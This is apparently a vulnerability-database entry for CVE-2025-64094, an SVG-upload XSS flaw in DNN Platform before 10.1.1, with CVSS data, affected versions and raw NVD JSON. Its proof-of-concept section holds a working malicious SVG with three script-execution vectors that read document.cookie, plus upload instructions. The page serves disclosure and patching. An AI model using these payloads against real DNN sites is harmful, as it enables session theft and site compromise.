Security Vulnerability Report
CVE-2025-64094 CVSS 6.4 MEDIUM

CVE-2025-64094

Published: 2025-10-28 22:15:38
Last Modified: 2025-11-03 19:38:47

Description

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to 10.1.1, sanitization of the content of uploaded SVG files was not covering all possible XSS scenarios. This vulnerability exists because of an incomplete fix for CVE-2025-48378. This vulnerability is fixed in 10.1.1.

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* - VULNERABLE
DNN Platform < 10.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- CVE-2025-64094 PoC - Malicious SVG file for XSS -->
<svg xmlns="http://www.w3.org/2000/svg">
  <!-- Basic XSS: inline script element -->
  <script>alert(document.cookie)</script>

  <!-- Alternative: using foreignObject to embed HTML with JavaScript -->
  <foreignObject width="100" height="100">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <img src="x" onerror="alert(document.domain)" />
    </div>
  </foreignObject>

  <!-- Alternative: using animate to trigger event -->
  <animate onbegin="alert(document.cookie)" attributeName="x" dur="1s" />
</svg>
<!-- Usage: Upload this SVG file to DNN Platform < 10.1.1, then access the file URL to trigger XSS payload -->

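References

https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-hmvq-8p83-cq52 (Vendor Advisory)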

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64094", "sourceIdentifier": "[email protected]", "published": "2025-10-28T22:15:38.240", "lastModified": "2025-11-03T19:38:46.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to 10.1.1, sanitization of the content of uploaded SVG files was not covering all possible XSS scenarios. This vulnerability exists because of an incomplete fix for CVE-2025-48378. This vulnerability is fixed in 10.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.1.1", "matchCriteriaId": "AADA05D8-5532-4750-85C9-7B6F25E3BFD7"}]}]}], "references": [{"url": 
"https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-hmvq-8p83-cq52", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}